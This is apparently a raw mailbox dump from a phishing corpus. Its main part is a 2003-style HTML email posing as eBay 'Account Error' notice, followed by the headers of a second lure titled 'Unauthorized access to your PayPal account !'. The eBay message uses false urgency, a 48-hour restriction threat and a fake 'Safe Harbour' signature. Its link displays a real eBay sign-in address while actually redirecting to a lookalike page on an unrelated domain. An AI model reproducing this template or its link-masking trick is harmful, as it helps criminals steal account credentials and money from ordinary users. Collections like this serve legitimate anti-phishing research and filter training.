From: eBay <service@eBay.com>
Content-Type: text/html
Status: O
X-Status: 
X-Keywords:                  
X-UID: 477


<div class=MsoNormal><A href="http://pages.ebay.com/"><SPAN
style="TEXT-DECORATION: none; text-underline: none"><IMG id=_x0000_i1025
height=40 alt="From collectibles to cars, buy and sell all kinds of
items on eBay"
src="http://pics.ebaystatic.com/aw/pics/register/HeaderRegister_387x40.gif"
width=387 border=0></SPAN></A></div> <TABLE class=MsoNormalTable
style="WIDTH: 6.25in; mso-cellspacing: 0in; mso-padding-alt: 0in 0in 0in
0in" cellSpacing=0 cellPadding=0 width=600 border=0> <TBODY> <TR
style="mso-yfti-irow: 0; mso-yfti-firstrow: yes"> <TD
style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in;
PADDING-TOP: 0in" colSpan=2> <div class=MsoNormal><IMG id=_x0000_i1026
height=10 alt=" " src="http://pics.ebaystatic.com/aw/pics/spacer.gif"
width=1 border=0></div></TD></TR> <TR style="mso-yfti-irow: 1"> <TD
style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; BACKGROUND: #9999cc;
PADDING-BOTTOM: 0in; PADDING-TOP: 0in" colSpan=2> <div
class=MsoNormal><IMG id=_x0000_i1027
 height=2 alt=" " src="http://pics.ebaystatic.com/aw/pics/spacer.gif"
width=1 border=0></div></TD></TR> <TR style="mso-yfti-irow: 2"> <TD
style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; BACKGROUND: #d6dcfe;
PADDING-BOTTOM: 0in; WIDTH: 18.75pt; PADDING-TOP: 0in" width=25> <div
class=MsoNormal><IMG id=_x0000_i1028 height=3
src="http://pics.ebaystatic.com/aw/pics/sitewide/leftLine_16x3.gif"
width=16 align=middle border=0></div></TD> <TD style="PADDING-RIGHT:
0in; PADDING-LEFT: 0in; BACKGROUND: #d6dcfe; PADDING-BOTTOM: 0in; WIDTH:
431.25pt; PADDING-TOP: 0in" width=575> <TABLE class=MsoNormalTable
style="WIDTH: 100%; mso-cellspacing: 0in; mso-padding-alt: 0in 5.4pt 0in
5.4pt" cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR
style="mso-yfti-irow: 0; mso-yfti-firstrow: yes; mso-yfti-lastrow: yes">
<TD style="PADDING-RIGHT: 0.75pt; PADDING-LEFT: 0.75pt; PADDING-BOTTOM:
0.75pt; PADDING-TOP: 0.75pt" noWrap> <div class=MsoNormal><B><SPAN
style="FONT-FAMILY: Verdana">Account
 Error</SPAN></B></div></TD> <TD style="PADDING-RIGHT: 0.75pt;
PADDING-LEFT: 0.75pt; PADDING-BOTTOM: 0.75pt; PADDING-TOP: 0.75pt"
noWrap> <div class=MsoNormal><IMG id=_x0000_i1029 height=1 alt=" "
src="http://pics.ebaystatic.com/aw/pics/spacer.gif" width=2
border=0></div></TD></TR></TBODY></TABLE> <div
class=MsoNormal><?xml:namespace prefix = o ns =
"urn:schemas-microsoft-com:office:office" /><o:p></o:p></div></TD></TR>
<TR style="mso-yfti-irow: 3; mso-yfti-lastrow: yes"> <TD
style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; BACKGROUND: #9999cc;
PADDING-BOTTOM: 0in; PADDING-TOP: 0in" colSpan=2> <div
class=MsoNormal><IMG id=_x0000_i1030 height=2 alt=" "
src="http://pics.ebaystatic.com/aw/pics/spacer.gif" width=1
border=0></div></TD></TR></TBODY></TABLE> <div class=MsoNormal><SPAN
style="DISPLAY: none; mso-hide: all"><o:p>&nbsp;</o:p></SPAN></div>
<TABLE class=MsoNormalTable style="WIDTH: 451pt; mso-cellspacing: 0in;
mso-padding-alt: 0in 0in 0in 0in" cellSpacing=0 cellPadding=0
 width=601 border=0> <TBODY> <TR style="HEIGHT: 17.25pt; mso-yfti-irow:
0; mso-yfti-firstrow: yes"> <TD style="PADDING-RIGHT: 0in; PADDING-LEFT:
0in; BACKGROUND: #eeeef8; PADDING-BOTTOM: 0in; WIDTH: 11.25pt;
PADDING-TOP: 0in; HEIGHT: 17.25pt" width=15> <div class=MsoNormal><IMG
id=_x0000_i1223 height=1 alt=" "
src="http://pics.ebaystatic.com/aw/pics/spacer.gif" width=15
border=0></div></TD> <TD style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in;
BACKGROUND: #eeeef8; PADDING-BOTTOM: 0in; WIDTH: 438.75pt; PADDING-TOP:
0in; HEIGHT: 17.25pt" noWrap width=585><PRE style="LINE-HEIGHT:
14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times
New Roman'">Dear eBay customer,<o:p></o:p></SPAN></PRE><PRE
style="LINE-HEIGHT: 14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black;
FONT-FAMILY: 'Times New Roman'"><SPAN style="mso-spacerun: yes">&nbsp;
</SPAN>During our regularly scheduled account maintenance and
verification <o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT:
14.4pt"><SPAN
 style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times New
Roman'">procedures, we have detected a slight error in your billing
information<o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT:
14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times
New Roman'"><SPAN style="mso-spacerun: yes">&nbsp;&nbsp;&nbsp;&nbsp;
</SPAN><o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT: 14.4pt"><SPAN
style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times New
Roman'"><SPAN style="mso-spacerun:
yes">&nbsp;&nbsp;&nbsp;&nbsp;</SPAN>This might be due to either of the
following reasons:<o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT:
14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times
New Roman'"><SPAN style="mso-spacerun: yes">&nbsp;&nbsp;
</SPAN><o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT: 14.4pt"><SPAN
style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times New
Roman'"><SPAN style="mso-spacerun: yes">&nbsp;&nbsp;</SPAN>1.A recent
change in your personal
 information(i.e. change of address)<o:p></o:p></SPAN></PRE><PRE
style="LINE-HEIGHT: 14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black;
FONT-FAMILY: 'Times New Roman'"><SPAN style="mso-spacerun: yes">&nbsp;
</SPAN>2. Submiting invalid information during the initial sing up
process.<o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT: 14.4pt"><SPAN
style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times New
Roman'"><SPAN style="mso-spacerun: yes">&nbsp; </SPAN>3.An inability to
accurately verify your selected option of payment
<o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT: 14.4pt"><SPAN
class=GramE><SPAN style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY:
'Times New Roman'">due</SPAN></SPAN><SPAN style="FONT-SIZE: 12pt; COLOR:
black; FONT-FAMILY: 'Times New Roman'"> to an internal error within our
processors.<o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT:
14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times
New Roman'"><o:p>&nbsp;</o:p></SPAN></PRE><PRE
 style="LINE-HEIGHT: 14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black;
FONT-FAMILY: 'Times New Roman'"><SPAN style="mso-spacerun:
yes">&nbsp;&nbsp; </SPAN>Please update and verify your information by
clicking the link <o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT:
14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times
New Roman'">below:<o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT:
14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times
New Roman'"><SPAN style="mso-spacerun: yes">&nbsp;
</SPAN><o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT: 14.4pt"><SPAN
style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times New
Roman'"><SPAN style="mso-spacerun: yes">&nbsp;&nbsp;&nbsp;</SPAN><A
href="http://google.com/url?sa=p&pref=ig&pval=2&q=http://www.thaiag.net/.signin.ebay.com/index.txt"><FONT
color=#0000ff>http://signin.ebay.ca/aw-cgi/eBayISAPI.dll?SignIn</FONT></A><o:p></o:p></SPAN></PRE><PRE
style="LINE-HEIGHT: 14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black;
FONT-FAMILY: 'Times New
 Roman'"><o:p>&nbsp;</o:p></SPAN></PRE><PRE style="LINE-HEIGHT:
14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times
New Roman'"><SPAN style="mso-spacerun: yes">&nbsp;&nbsp; </SPAN>If your
account information is not updated within 48 hours then your
<o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT: 14.4pt"><SPAN
style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times New
Roman'">ability to sell or bid on eBay will become
restricted.<o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT:
14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times
New Roman'"><SPAN style="mso-spacerun: yes">&nbsp;&nbsp;
</SPAN><o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT: 14.4pt"><SPAN
style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times New
Roman'"><SPAN style="mso-spacerun: yes">&nbsp;&nbsp;&nbsp;</SPAN>Kenneth
Pavel<o:p></o:p></SPAN></PRE><PRE style="LINE-HEIGHT: 14.4pt"><SPAN
style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times New
 Roman'"><o:p>&nbsp;</o:p></SPAN></PRE><PRE style="LINE-HEIGHT: 
14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black; FONT-FAMILY: 'Times 
New Roman'"><SPAN style="mso-spacerun: yes">&nbsp;&nbsp;&nbsp; 
</SPAN>eBay Safe Harbour Dpt.<o:p></o:p></SPAN></PRE><PRE 
style="LINE-HEIGHT: 14.4pt"><SPAN style="FONT-SIZE: 12pt; COLOR: black; 
FONT-FAMILY: 'Times New Roman'"><o:p>&nbsp;</o:p></SPAN></PRE>  <div 
style="LINE-HEIGHT: 14.4pt"><SPAN style="FONT-SIZE: 7.5pt; COLOR: 
#666666; FONT-FAMILY: Arial">As outlined in our User Agreement, eBay 
will periodically send you information about site changes and
enhancements. Visit our <A
href="http://pages.ebay.ca/help/community/png-priv.html?ssPageName=ADME:X:EOAS:CA:14"
target=_blank>Privacy Policy</A> and <A
href="http://pages.ebay.ca/help/community/png-user.html?ssPageName=ADME:X:EOAS:CA:13"
target=_blank>User Agreement</A> if you have any questions. 
<o:p></o:p></SPAN></div> <div style="LINE-HEIGHT: 14.4pt; TEXT-ALIGN:
center" align=center><SPAN
 style="FONT-SIZE: 7.5pt; COLOR: #666666; FONT-FAMILY: Arial">Copyright 
© 2003 eBay Inc. All Rights Reserved. <BR>Designated trademarks and 
brands are the property of their respective owners. 
<o:p></o:p></SPAN></div>  <div style="LINE-HEIGHT: 14.4pt; TEXT-ALIGN: 
center" align=center><SPAN class=GramE><SPAN style="FONT-SIZE: 7.5pt; 
COLOR: #666666; FONT-FAMILY: Arial">eBay</SPAN></SPAN><SPAN 
style="FONT-SIZE: 7.5pt; COLOR: #666666; FONT-FAMILY: Arial"> and the 
eBay logo are trademarks of eBay 
Inc.<o:p></o:p></SPAN></div></TD></TR></TBODY></TABLE>

From root@eco04.chem.metro-u.ac.jp  Mon Feb 27 20:21:02 2006
Return-Path: <root@eco04.chem.metro-u.ac.jp>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id C2EC9536F09
	for <nobody@login.example.com>; Mon, 27 Feb 2006 20:21:01 -0500 (EST)
Received: from eco04.chem.metro-u.ac.jp (eco04.chem.metro-u.ac.jp [133.86.162.216])
	by mail2.example.com (Postfix) with ESMTP id DB9556FA34C
	for <nobody@example.com>; Mon, 27 Feb 2006 20:21:01 -0500 (EST)
Received: by eco04.chem.metro-u.ac.jp (Postfix, from userid 0)
	id 4409AA0AAD; Tue, 28 Feb 2006 10:20:57 +0900 (JST)
To: nobody@example.com
Subject: Unauthorized access to your PayPal account !
